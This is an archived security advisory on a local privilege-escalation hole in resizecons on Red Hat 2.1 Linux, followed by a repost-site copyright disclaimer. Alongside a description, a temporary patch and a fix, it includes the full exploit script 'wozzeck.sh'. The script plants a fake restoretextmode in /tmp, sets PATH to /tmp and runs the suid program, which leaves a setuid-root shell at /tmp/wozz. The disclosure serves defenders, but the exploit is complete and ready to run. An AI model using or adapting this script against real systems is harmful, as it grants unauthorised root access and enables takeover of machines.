There is a security hole in RedHat 2.1, which installs the program
/usr/bin/resizecons suid root. The resizecons program allows a user
to change the videmode of the console. During this process, it runs
the program restoretextmode without an absolute pathname, assuming the
correct version will be found in the path, while running with root
privileges. It then executes setfont in the same manner. By setting
the path to find a rogue restoretextmode, a user can execute an arbitrary
program as root.
As a more amusing aside, the file /tmp/selection.pid is read and the
pid contained within is sent a SIGWINCH, allowing a user on the system
to force a redraw of the screen to an arbitrary process (that handles
SIGWINCH calls) on the machine.
If /usr/bin/resizecons needs to be run by users other than root at the
console, provisions need to be made in the code to execute the outside
utilities with absolute pathnames, and to check access rights on files
before opening.
Program: /usr/bin/resizecons
Affected Operating Systems: Red Hat 2.1 linux distribution
Requirements: account on system
Temporary Patch: chmod -s /usr/bin/resizecons
Security Compromise: root
Author: Dave M. (davem@cmu.edu)
Synopsis: resizecons runs restoretextmode without an
absolute pathname while executing as root,
allowing a user to substitute the real
program with arbitrary commands.
Exploit:
wozzeck.sh:
#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
#
# by Dave M. (davem@cmu.edu)
#
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz. Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi
|
|
Disclaimer: The file contained in the
box above or displayed in a separate window from a link in the
box above is NOT owned nor implied to
be owned by BeYoND THe iLLuSioN. Most files at BeYoND THe
iLLuSioN are originally from public Bulletin Board Systems
(BBS) which were popular in the days before the Internet or
from gopher, web, and FTP sites from the early days of the
Internet which no longer exist today. Essentially, all files
were acquired from the public domain in one for or another.
However, there have been occasions when copyright protected
material has appeared on BeYoND THe iLLuSIoN without permission
of the copyright holder. In these instances, we have and will
continue to remove the copyright protected file as soon as it
is brought to our attention. This can now be done using our Report Copyright Material form. Fill
out the form, and the webmaster will be notified of the
situation.
There are also times when files found on BeYoND THe iLLuSioN
have a real home somewhere else on the Internet. In these
instances, we will gladly replace the file with a link to its
true home whenever it is brought to our attention. If you know
of the true home of any of these files, you can use our Report Original URL form to bring it yo our
attention.
|
